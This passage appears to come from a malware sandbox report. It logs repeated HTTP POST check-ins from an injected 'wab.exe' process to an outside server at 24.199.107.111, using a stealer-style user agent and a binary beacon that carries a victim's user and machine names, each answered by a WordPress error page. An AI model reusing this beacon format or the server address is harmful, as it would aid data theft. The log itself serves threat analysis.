                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:43.260308981 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:43.260320902 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.54976024.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:43.577756882 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:43.741400003 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:44.549801111 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:43 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:44.549823999 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:44.549835920 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.54976124.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:44.926070929 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:45.088519096 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:45.925352097 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:45 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:45.925380945 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:45.925399065 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              42192.168.2.54976224.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:46.232170105 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:46.394880056 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:47.228276968 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:46 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
